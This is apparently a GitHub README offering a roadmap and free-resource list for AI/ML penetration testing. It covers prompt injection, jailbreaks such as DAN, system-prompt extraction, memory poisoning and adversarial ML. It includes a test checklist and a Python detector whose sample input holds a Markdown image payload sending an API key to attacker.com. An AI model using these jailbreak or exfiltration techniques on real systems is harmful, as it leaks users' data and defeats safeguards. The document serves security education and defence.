anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection

A beginner-friendly AI/ML penetration testing roadmap and collection of free resources, covering prompt injection, LLM attacks, and hands-on practice.

Stars: 178 | Forks: 30
# 🛡️ AI/ML Penetration Testing Learning Roadmap

![output](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/34752df0d1004644.jpg)

## 📋 Table of Contents

1. [Prerequisites](#prerequisites)
2. [Phase 1 — Foundations](#phase-1--foundations)
3. [Phase 2 — AI/ML Security Concepts](#phase-2--aiml-security-concepts)
4. [Phase 3 — Prompt Injection & LLM Attacks](#phase-3--prompt-injection--llm-attacks)
5. [Phase 4 — Hands-On Practice](#phase-4--hands-on-practice)
6. [Phase 5 — Advanced Exploitation Techniques](#phase-5--advanced-exploitation-techniques)
7. [Phase 6 — Real-World Research & Bug Bounty](#phase-6--real-world-research--bug-bounty)
8. [Standards, Frameworks & References](#standards-frameworks--references)
9. [Tools & Repositories](#tools--repositories)
10. [Books, PDFs & E-Books](#books-pdfs--e-books)
11. [Video Resources](#video-resources)
12. [CTF & Competitions](#ctf--competitions)
13. [Bug Bounty Programs](#bug-bounty-programs)
14. [Community & News](#community--news)
15. [Suggested Learning Path by Experience Level](#suggested-learning-path-by-experience-level)

## Prerequisites

Before diving into AI/ML penetration testing, make sure you have the following foundations:

### General Security Fundamentals

- [PortSwigger Web Security Academy](https://portswigger.net/web-security) — free, hands-on web security training (XSS, SQLi, SSRF, and more)
- [TryHackMe — Pre-Security Path](https://tryhackme.com/path/outline/presecurity)
- [HackTheBox Academy](https://academy.hackthebox.com/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

### Programming (Python is essential)

- [Python for Everybody — Coursera](https://www.coursera.org/specializations/python)
- [Automate the Boring Stuff with Python](https://automatetheboringstuff.com/) — free online book
- [CS50P — Python](https://cs50.harvard.edu/python/) — free Harvard course

### APIs & HTTP

- Understand REST APIs, HTTP methods, headers, and authentication flows
- [Postman Learning Center](https://learning.postman.com/)
- Practice with tools: `curl`, `Burp Suite`, `Postman`

## Phase 1 — Foundations

### 1.1 Machine Learning Basics

| Resource | Type | Cost |
|---|---|---|
| [Machine Learning — Andrew Ng (Coursera)](https://www.coursera.org/learn/machine-learning) | Course | Free to audit |
| [Introduction to ML — edX](https://www.edx.org/course/introduction-to-machine-learning) | Course | Free to audit |
| [fast.ai Practical Deep Learning](https://course.fast.ai/) | Course | Free |
| [Google Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course) | Course | Free |
| [Kaggle ML Courses](https://www.kaggle.com/learn) | Course | Free |
| [3Blue1Brown — Neural Networks](https://www.youtube.com/playlist?list=PLZHQObOWTQDNU6R1_67000Dx_ZCJB-3pi) | Video | Free |

### 1.2 Large Language Models

Understanding how LLMs work is essential before attacking them.

| Resource | Type | Cost |
|---|---|---|
| [Andrej Karpathy — Intro to LLMs](https://www.youtube.com/watch?v=zjkBMFhNj_g) | Video | Free |
| [Andrej Karpathy — Let's build GPT](https://www.youtube.com/watch?v=kCc8FmEb1nY) | Video | Free |
| [Hugging Face NLP Course](https://huggingface.co/learn/nlp-course) | Course | Free |
| [LLM University by Cohere](https://llmu.cohere.com/) | Course | Free |
| [Prompt Engineering Guide](https://www.promptingguide.ai/) | Guide | Free |

## Phase 2 — AI/ML Security Concepts

### 2.1 Core Security Concepts

- [OWASP LLM Top 10](https://genai.owasp.org/) — the authoritative list of LLM vulnerabilities
- [MITRE ATLAS Matrix](https://atlas.mitre.org/matrices/ATLAS/) — adversarial tactics, techniques, and common knowledge for AI systems
- [NIST AI Risk Management Framework](https://airc.nist.gov/Home) — US federal AI risk guidance
- [IBM — AI Security Overview](https://www.ibm.com/topics/ai-security)
- [AI Village — LLM Threat Modeling](https://aivillage.org/large%20language%20models/threat-modeling-llm/)
- [Promptingguide — Adversarial Attacks](https://www.promptingguide.ai/risks/adversarial)
- [HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI](https://www.hackerone.com/resources/e-book/the-ultimate-guide-to-managing-ethical-and-security-risks-in-ai)

### 2.2 Attack Surface Overview

Key attack vectors in AI/ML systems:

- **Prompt Injection** — manipulating LLM behavior through crafted input
- **Jailbreaking** — bypassing safety filters and guardrails
- **Model Inversion** — extracting training data from a model
- **Membership Inference** — determining whether data was in the training set
- **Data Poisoning** — corrupting training data to influence behavior
- **Adversarial Examples** — perturbed inputs that fool classifiers
- **Model Extraction/Stealing** — cloning a model through API queries
- **Supply Chain Attacks** — malicious models/weights on platforms such as Hugging Face
- **Insecure Plugin/Tool Integration** — exploiting LLM agents wired to external tools
- **Training Data Exfiltration** — extracting memorized private data
- **Denial of Service** — overloading a model with crafted prompts

### 2.3 MLOps & Infrastructure Security

- [From MLOps to MLOops — JFrog](https://jfrog.com/blog/from-mlops-to-mloops-exposing-the-attack-surface-of-machine-learning-platforms/)
- [Offensive ML Playbook](https://wiki.offsecml.com/Welcome+to+the+Offensive+ML+Playbook)
- [AI Exploits — ProtectAI](https://github.com/protectai/ai-exploits)
- [Awesome AI Security — ottosulin](https://github.com/ottosulin/awesome-ai-security)

## Phase 3 — Prompt Injection & LLM Attacks

### 3.1 Understanding Prompt Injection

- [IBM Guide on Prompt Injection](https://www.ibm.com/topics/prompt-injection)
- [Simon Willison's Explanation of Prompt Injection](https://simonwillison.net/2023/May/2/prompt-injection-explained/)
- [Learn Prompting — Prompt Hacking and Injection](https://learnprompting.org/docs/prompt_hacking/injection)
- [PortSwigger LLM Attacks](https://portswigger.net/web-security/llm-attacks)
- [NCC Group — Exploring Prompt Injection Attacks](https://research.nccgroup.com/2022/12/05/exploring-prompt-injection-attacks/)
- [Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection](https://www.bugcrowd.com/blog/ai-vulnerability-deep-dive-prompt-injection/)

### 3.2 Jailbreaking Techniques

- **DAN (Do Anything Now)** — the classic jailbreak: [Chatgpt-DAN Repo](https://github.com/alexisvalentino/Chatgpt-DAN)
- **Role-play / persona manipulation**
- **Token smuggling** — encoding instructions to bypass filters
- **Prompt leaking** — extracting the system prompt
- **Indirect prompt injection** — attacks via documents, web content, memory
- [WideOpenAI — Jailbreak Collection](https://github.com/WibblyOWobbly/WideOpenAI)
- [PayloadsAllTheThings — Prompt Injection](https://swisskyrepo.github.io/PayloadsAllTheThings/Prompt%20Injection/)
- [PALLMs — Payloads for Attacking LLMs](https://github.com/mik0w/pallms/)

### 3.3 Indirect Prompt Injection

A more sophisticated attack in which malicious instructions are injected through external data sources (emails, documents, websites) that an LLM agent processes.

- [Greshake — LLM Security / Not What You've Signed Up For](https://github.com/greshake/llm-security)
- [Embrace The Red — Blog](https://embracethered.com/blog/) — a comprehensive blog covering real-world indirect injection
- [GitHub Copilot Chat: Prompt Injection to Data Exfiltration](https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/)
- [Google AI Studio Data Exfiltration](https://embracethered.com/blog/posts/2024/google-ai-studio-data-exfiltration-now-fixed/)

### 3.4 Advanced Prompt Attack Techniques

- [How to Persuade an LLM to Change Its System Prompt](https://medium.com/@KonradDaWo/how-to-persuade-a-llm-to-change-its-system-prompt-to-aid-in-ctf-challenges-e74c1d570ed3)
- [Bugcrowd Ultimate Guide to AI Security (PDF)](https://www.bugcrowd.com/wp-content/uploads/2024/04/Ultimate-Guide-AI-Security.pdf)
- [Snyk OWASP Top 10 LLM (PDF)](https://go.snyk.io/rs/677-THP-415/images/owasp-top-10-llm.pdf)
- [Vanna.AI Prompt Injection RCE — JFrog](https://jfrog.com/blog/prompt-injection-attack-code-execution-in-vanna-ai-cve-2024-5565/)

## Phase 4 — Hands-On Practice

### 4.1 Interactive Platforms & Games

| Platform | Description | Link |
|---|---|---|
| Gandalf | LLM prompt testing game — extract the password | [gandalf.lakera.ai](https://gandalf.lakera.ai/) |
| Prompt Airlines | Gamified prompt injection learning | [promptairlines.com](https://promptairlines.com/) |
| Crucible | Interactive AI security challenges by Dreadnode | [crucible.dreadnode.io](https://crucible.dreadnode.io/) |
| Immersive Labs AI | Structured AI security exercises | [prompting.ai.immersivelabs.com](https://prompting.ai.immersivelabs.com/) |
| Secdim AI Games | Prompt injection games | [play.secdim.com/game/ai](https://play.secdim.com/game/ai) |
| HackAPrompt | Community prompt injection competition | [hackaprompt.com](https://www.hackaprompt.com/) |
| PortSwigger LLM Labs | Hands-on web LLM attack labs | [Web Security Academy](https://portswigger.net/web-security/llm-attacks) |

### 4.2 Deliberately Vulnerable Projects

| Repository | Description |
|---|---|
| [Damn Vulnerable LLM Agent — WithSecureLabs](https://github.com/WithSecureLabs/damn-vulnerable-llm-agent) | Deliberately vulnerable LLM agent |
| [ScottLogic Prompt Injection Playground](https://github.com/ScottLogic/prompt-injection) | Local prompt injection lab |
| [Greshake LLM Security Tools](https://github.com/greshake/llm-security) | Proof-of-concept attacks |

### 4.3 CTF Writeups Worth Studying

- [CTF Writeup — HackPack CTF 2024 LLM Edition](https://medium.com/@embossdotar/ctf-writeup-hackpack-ctf-2024-llm-edition-yellowdog-1-db02a36e1051)
- [LLM Pentest Writeups — System Weakness](https://systemweakness.com/large-language-model-llm-pen-testing-part-i-2ef96acb6763)

## Phase 5 — Advanced Exploitation Techniques

### 5.1 Agent & Tool Integration Attacks

When an LLM is integrated with tools (code execution, web browsing, file system access), the attack surface expands dramatically.

- [LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec](https://www.blazeinfosec.com/post/llm-pentest-agent-hacking/)
- [Dumping a Database with an AI Chatbot — Synack](https://www.synack.com/blog/dumping-a-database-with-an-ai-chatbot/)
- [CSWSH Meets LLM Chatbots](https://medium.com/@r3vsh/cswsh-meets-llm-chatbots-3ab09af5ab6f)

### 5.2 Data Exfiltration via LLMs

- [Google AI Studio: LLM-Powered Data Exfiltration](https://embracethered.com/blog/posts/2024/google-ai-studio-data-exfiltration-now-fixed/)
- [Google AI Studio Mass Data Exfil (Regression)](https://embracethered.com/blog/posts/2024/google-aistudio-mass-data-exfil/)
- [Hacking Google Bard — From Prompt Injection to Data Exfiltration](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/)
- [AWS Amazon Q Markdown Rendering Vulnerability](https://embracethered.com/blog/posts/2024/aws-amazon-q-fixes-markdown-rendering-vulnerability/)
- [GitHub Copilot Chat Data Exfiltration](https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/)

### 5.3 Account Takeover & Authentication Attacks

- [ChatGPT Account Takeover — Wildcard Web Cache Deception](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)
- [Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
- [Security Flaws in ChatGPT Ecosystem — Salt Security](https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-data)
- [OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx](https://checkmarx.com/blog/openai-allowed-unlimited-credit-on-new-accounts/)

### 5.4 XSS & Web Vulnerabilities in AI Products

- [XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva](https://www.imperva.com/blog/xss-marks-the-spot-digging-up-vulnerabilities-in-chatgpt/)
- [Zeroday on GitHub Copilot](https://gccybermonks.com/posts/github/)

### 5.5 Model & Infrastructure Attacks

- [Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)](https://www.oligo.security/blog/shelltorch-explained-multiple-vulnerabilities-in-pytorch-model-server)
- [From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva](https://www.imperva.com/blog/from-chatbot-to-spybot-chatgpt-post-exploitation/)

### 5.6 Persistence & Memory Manipulation

- [ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red](https://embracethered.com/blog/posts/2024/chatgpt-persistent-denial-of-service/)

### 5.7 Adversarial Machine Learning

- [CleverHans Library](https://github.com/cleverhans-lab/cleverhans) — adversarial examples library
- [ART (Adversarial Robustness Toolbox) — IBM](https://github.com/Trusted-AI/adversarial-robustness-toolbox)
- [Foolbox](https://github.com/bethgelab/foolbox) — Python toolbox for adversarial attacks

## Phase 6 — Real-World Research & Bug Bounty

### 6.1 Notable Research & Disclosures

- [We Hacked Google AI for $50,000 — LandH](https://www.landh.tech/blog/20240304-google-hack-50000/)
- [New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer](https://hiddenlayer.com/research/new-google-gemini-content-manipulation-vulns-found/#Overview)
- [Jailbreak of Meta AI (Llama 3.1) Revealing Config Details](https://medium.com/@kiranmaraju/jailbreak-of-meta-ai-llama-3-1-revealing-configuration-details-9f0759f5006a)
- [Bypass Instructions to Manipulate Google Bard](https://medium.com/@kiranmaraju/bypass-instructions-to-manipulate-google-bard-ai-conversational-generative-ai-chatbot-to-reveal-ac23156d5eee)
- [My LLM Bug Bounty journey on Hugging Face Hub](https://medium.com/@zpbrent/my-llm-bug-bounty-journey-on-hugging-face-hub-via-protect-ai-9f3a1bc72c2e)
- [Anonymised Penetration Test Report — Volkis](https://handbook.volkis.com.au/assets/doc/Volkis%20-%20Anonymous%20Client%20-%20Penetration%20Test%20May%202023.pdf)
- [Lakera Real World LLM Exploits (PDF)](https://lakera-marketing-public.s3.eu-west-1.amazonaws.com/Lakera%2BAI%2B-%2BReal%2BWorld%2BLLM%2BExploits%2B(Jan%2B2024)-min.pdf)

### 6.2 How to Find LLM Vulnerabilities

Key areas to test when assessing an LLM-based application:

1. **System prompt extraction** — can you leak the hidden system prompt?
2. **Instruction override** — can you make the model ignore system-level instructions?
3. **Plugin/tool abuse** — can agent tools be abused (SSRF, RCE, SQLi)?
4. **Data exfiltration via Markdown** — does the UI render `![](https://attacker.com?q=...)`?
5. **Persistent injection via memory** — can you plant instructions that persist in memory/RAG?
6. **PII leakage** — does the model leak training data or other users' data?
7. **Cross-user data leakage** — in multi-tenant apps, can you access another user's context?
8. **Authentication bypass** — can you trick the LLM into performing privileged actions?
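
Item 4 in the checklist above can be checked mechanically: if the UI renders model output as Markdown, an injected image tag makes the browser issue a GET request to the attacker's host, leaking whatever the model embeds in the URL's query string. Below is a minimal sketch of such a check; the `ALLOWED_HOSTS` allow-list, the function name, and the sample outputs are illustrative assumptions, not part of any tool listed here.

```python
import re
from urllib.parse import urlparse

# Hosts the application legitimately serves images from (illustrative assumption).
ALLOWED_HOSTS = {"example.com", "cdn.example.com"}

# Markdown image syntax: ![alt](url)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def find_exfil_images(model_output: str) -> list[str]:
    """Return image URLs in model output that point outside the allow-list.

    Rendering such an image triggers a GET request, so any secret the model
    places in the query string reaches the attacker's server.
    """
    suspicious = []
    for match in MD_IMAGE.finditer(model_output):
        url = match.group(1)
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_HOSTS:
            suspicious.append(url)
    return suspicious

# Output produced by a hypothetical injected prompt: flagged.
print(find_exfil_images("Summary done. ![](https://attacker.com/x.png?q=API_KEY_12345)"))
# A benign image on an allow-listed host: not flagged.
print(find_exfil_images("![logo](https://example.com/logo.png)"))
```

The same idea applies defensively: stripping or proxying any image whose host fails this check is a common mitigation for the Markdown-rendering exfiltration bugs covered in the Embrace the Red posts above.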
## Standards, Frameworks & References

| Resource | Description |
|---|---|
| [OWASP LLM Top 10](https://genai.owasp.org/) | Top 10 LLM vulnerability categories |
| [MITRE ATLAS](https://atlas.mitre.org/matrices/ATLAS/) | Adversarial threat matrix for AI |
| [NIST AI RMF](https://airc.nist.gov/Home) | US federal AI risk management framework |
| [OWASP AI Exchange](https://owaspai.org/) | Cross-industry AI security guidance |
| [ISO/IEC 42001](https://www.iso.org/standard/81230.html) | International AI management standard |
| [ENISA AI Threat Landscape](https://www.enisa.europa.eu/publications/enisa-threat-landscape-for-artificial-intelligence) | EU AI threat landscape report |
| [Google Secure AI Framework (SAIF)](https://safety.google/cybersecurity-advancements/saif/) | Google's AI security framework |

## Tools & Repositories

### Offensive Tools

| Tool | Purpose |
|---|---|
| [Garak](https://github.com/leondz/garak) | LLM vulnerability scanner |
| [PyRIT](https://github.com/Azure/PyRIT) | Microsoft's Python Risk Identification Toolkit for LLMs |
| [LLM Fuzzer](https://github.com/mnns/LLMFuzzer) | LLM fuzzing framework |
| [PALLMs](https://github.com/mik0w/pallms/) | Payloads for attacking LLMs |
| [PromptInject](https://github.com/agencyenterprise/PromptInject) | Prompt injection attack framework |
| [PurpleLlama / CyberSecEval](https://github.com/facebookresearch/PurpleLlama) | Meta's LLM security evaluations |
| [LLM Injector](https://github.com/anmolksachan/LLMInjector) | LLM Injector Burp Suite extension |

### Defensive / Scanning Tools

| Tool | Purpose |
|---|---|
| [Rebuff](https://github.com/protectai/rebuff) | Prompt injection detection |
| [NeMo Guardrails](https://github.com/NVIDIA/NeMo-Guardrails) | NVIDIA's guardrails framework |
| [Lakera Guard](https://www.lakera.ai/) | Commercial prompt injection protection |
| [AI Exploits — ProtectAI](https://github.com/protectai/ai-exploits) | Collection of real-world ML exploits |
| [ModelScan](https://github.com/protectai/modelscan) | Scans ML model files for malicious code |

### Reference Lists

| Resource | Description |
|---|---|
| [Awesome LLM Security — corca-ai](https://github.com/corca-ai/awesome-llm-security) | Curated LLM security list |
| [Awesome LLM — Hannibal046](https://github.com/Hannibal046/Awesome-LLM) | All-in-one LLM resources, security included |
| [Awesome AI Security — ottosulin](https://github.com/ottosulin/awesome-ai-security) | General AI security resources |
| [LLM Hacker's Handbook](https://github.com/forcesunseen/llm-hackers-handbook) | Comprehensive hacking handbook |
| [PayloadsAllTheThings — Prompt Injection](https://swisskyrepo.github.io/PayloadsAllTheThings/Prompt%20Injection/) | Payload collection |
| [WideOpenAI](https://github.com/WibblyOWobbly/WideOpenAI) | Jailbreak and bypass collection |
| [Chatgpt-DAN](https://github.com/alexisvalentino/Chatgpt-DAN) | DAN jailbreak collection |

## Books, PDFs & E-Books

| Resource | Link |
|---|---|
| LLM Hacker's Handbook | [GitHub](https://github.com/forcesunseen/llm-hackers-handbook) |
| OWASP Top 10 for LLM (Snyk) | [PDF](https://go.snyk.io/rs/677-THP-415/images/owasp-top-10-llm.pdf) |
| Bugcrowd Ultimate Guide to AI Security | [PDF](https://www.bugcrowd.com/wp-content/uploads/2024/04/Ultimate-Guide-AI-Security.pdf) |
| Lakera Real World LLM Exploits | [PDF](https://lakera-marketing-public.s3.eu-west-1.amazonaws.com/Lakera%2BAI%2B-%2BReal%2BWorld%2BLLM%2BExploits%2B(Jan%2B2024)-min.pdf) |
| HackerOne Ultimate Guide to Managing AI Risks | [E-Book](https://www.hackerone.com/resources/e-book/the-ultimate-guide-to-managing-ethical-and-security-risks-in-ai) |
| Adversarial Machine Learning — Goodfellow et al. | [arXiv](https://arxiv.org/abs/1412.6572) |

## Video Resources

| Resource | Link |
|---|---|
| Penetration Testing Against and With AI/LLM/ML (Playlist) | [YouTube](https://www.youtube.com/playlist?list=PL1Aj7oPl6slsd3Er7PfeOIEFYPDQvMRUf) |
| Andrej Karpathy — Intro to Large Language Models | [YouTube](https://www.youtube.com/watch?v=zjkBMFhNj_g) |
| DEF CON AI Village Talks | [YouTube](https://www.youtube.com/@AIVillage) |
| LiveOverflow — AI/ML Security | [YouTube](https://www.youtube.com/@LiveOverflow) |
| 3Blue1Brown — Neural Networks Series | [YouTube](https://www.youtube.com/playlist?list=PLZHQObOWTQDNU6R1_67000Dx_ZCJB-3pi) |
| John Hammond — AI Security Challenges | [YouTube](https://www.youtube.com/@_JohnHammond) |
| Cybrary — Machine Learning Security | [Cybrary](https://www.cybrary.it/course/machine-learning-security/) |

## CTF & Competitions

| Competition | Description | Link |
|---|---|---|
| Crucible | Ongoing AI security challenges | [crucible.dreadnode.io](https://crucible.dreadnode.io/) |
| HackAPrompt | Annual prompt injection competition | [hackaprompt.com](https://www.hackaprompt.com/) |
| AI Village CTF (DEF CON) | Annual AI security CTF at DEF CON | [aivillage.org](https://aivillage.org/) |
| Gandalf | Self-paced LLM challenges | [gandalf.lakera.ai](https://gandalf.lakera.ai/) |
| Prompt Airlines | Gamified injection challenges | [promptairlines.com](https://promptairlines.com/) |
| Hack The Box AI Challenges | HTB AI-themed challenges | [hackthebox.com](https://www.hackthebox.com/) |
| Secdim AI Games | Web-based AI security games | [play.secdim.com/game/ai](https://play.secdim.com/game/ai) |

## Bug Bounty Programs

AI/ML security bug bounties are growing fast. Target these platforms:

| Program | Scope | Link |
|---|---|---|
| OpenAI Bug Bounty | ChatGPT, API, plugins | [bugcrowd.com/openai](https://bugcrowd.com/openai) |
| Google AI Bug Bounty | Gemini, Bard, Vertex AI | [bughunters.google.com](https://bughunters.google.com/) |
| Meta AI Bug Bounty | Llama models, Meta AI | [facebook.com/whitehat](https://www.facebook.com/whitehat) |
| HuggingFace via ProtectAI | Hub, models, spaces | [huntr.com](https://huntr.com/) |
| Anthropic Bug Bounty | Claude, API | [anthropic.com/security](https://www.anthropic.com/security) |
| Microsoft (Copilot, Azure AI) | Copilot, Azure OpenAI | [msrc.microsoft.com](https://msrc.microsoft.com/create-report) |
| Huntr (AI/ML focused) | Open-source ML libraries | [huntr.com](https://huntr.com/) |

**AI bug bounty tips:**

- Focus on **data exfiltration via Markdown rendering** (a common finding)
- Test **plugin/tool integrations** thoroughly
- Look for **prompt injection in RAG pipelines**
- Explore **memory and persistent context manipulation**
- Check for **cross-tenant data leakage** in multi-user deployments

## Community & News

### Communities

- [AI Village](https://aivillage.org/) — DEF CON's AI security community
- [OWASP AI Exchange](https://owaspai.org/) — open standards for AI security
- [ProtectAI](https://protectai.com/) — AI security research and tooling
- [Embrace the Red — Blog](https://embracethered.com/blog/) — leading LLM security blog
- [Kai Greshake's Research](https://kai-greshake.de/) — indirect prompt injection research

### Newsletters & Blogs

- [The Batch — DeepLearning.AI](https://www.deeplearning.ai/the-batch/) — weekly AI news
- [Simon Willison's Weblog](https://simonwillison.net/) — authoritative LLM security commentary
- [HiddenLayer Research](https://hiddenlayer.com/research/) — AI security research
- [Lakera Blog](https://www.lakera.ai/blog) — LLM security insights
- [PortSwigger Research](https://portswigger.net/research) — web + AI security research

## Suggested Learning Path by Experience Level

### 🟢 Beginner (0–3 months)

1. Complete the [PortSwigger Web Security Academy](https://portswigger.net/web-security) fundamentals
2. Learn Python basics
3. Take the [Google ML Crash Course](https://developers.google.com/machine-learning/crash-course)
4. Read the [OWASP LLM Top 10](https://genai.owasp.org/)
5. Play [Gandalf](https://gandalf.lakera.ai/) — beat all levels
6. Read [Simon Willison's prompt injection article](https://simonwillison.net/2023/May/2/prompt-injection-explained/)
7. Watch [Andrej Karpathy — Intro to LLMs](https://www.youtube.com/watch?v=zjkBMFhNj_g)

### 🟡 Intermediate (3–9 months)

1. Study the [MITRE ATLAS Matrix](https://atlas.mitre.org/matrices/ATLAS/)
2. Complete the [PortSwigger LLM Attack labs](https://portswigger.net/web-security/llm-attacks)
3. Deploy and exploit the [Damn Vulnerable LLM Agent](https://github.com/WithSecureLabs/damn-vulnerable-llm-agent)
4. Finish the [Prompt Airlines](https://promptairlines.com/) and [Crucible](https://crucible.dreadnode.io/) challenges
5. Read the [LLM Hacker's Handbook](https://github.com/forcesunseen/llm-hackers-handbook)
6. Work through the [Embrace the Red blog](https://embracethered.com/blog/)
7. Experiment with [Garak](https://github.com/leondz/garak) and [PyRIT](https://github.com/Azure/PyRIT)
8. Try the [Offensive ML Playbook](https://wiki.offsecml.com/Welcome+to+the+Offensive+ML+Playbook)

### 🔴 Advanced (9+ months)

1. Compete in the [AI Village CTF at DEF CON](https://aivillage.org/)
2. Submit findings to [Huntr](https://huntr.com/) or the [OpenAI Bug Bounty](https://bugcrowd.com/openai)
3. Study adversarial ML with [ART](https://github.com/Trusted-AI/adversarial-robustness-toolbox) and [CleverHans](https://github.com/cleverhans-lab/cleverhans)
4. Read academic papers on model inversion, membership inference, and data extraction
5. Contribute to open-source tools such as [Garak](https://github.com/leondz/garak) or [AI Exploits](https://github.com/protectai/ai-exploits)
6. Build your own vulnerable LLM demo environment
7. Write and publish research — blog posts, CVEs, conference talks

## Key Academic Papers

| Paper | Year |
|---|---|
| [Explaining and Harnessing Adversarial Examples — Goodfellow et al.](https://arxiv.org/abs/1412.6572) | 2014 |
| [Extracting Training Data from Large Language Models — Carlini et al.](https://arxiv.org/abs/2012.07805) | 2021 |
| [Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al.](https://arxiv.org/abs/2302.12173) | 2023 |
| [Membership Inference Attacks against Machine Learning Models — Shokri et al.](https://arxiv.org/abs/1610.05820) | 2017 |
| [Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al.](https://arxiv.org/abs/2307.15043) | 2023 |
| [Jailbroken: How Does LLM Safety Training Fail? — Wei et al.](https://arxiv.org/abs/2307.02483) | 2023 |
| [Prompt Injection attack against LLM-integrated Applications](https://arxiv.org/abs/2306.05499) | 2023 |

*Last updated: 2025 | Contributions welcome — submit a PR with new resources.*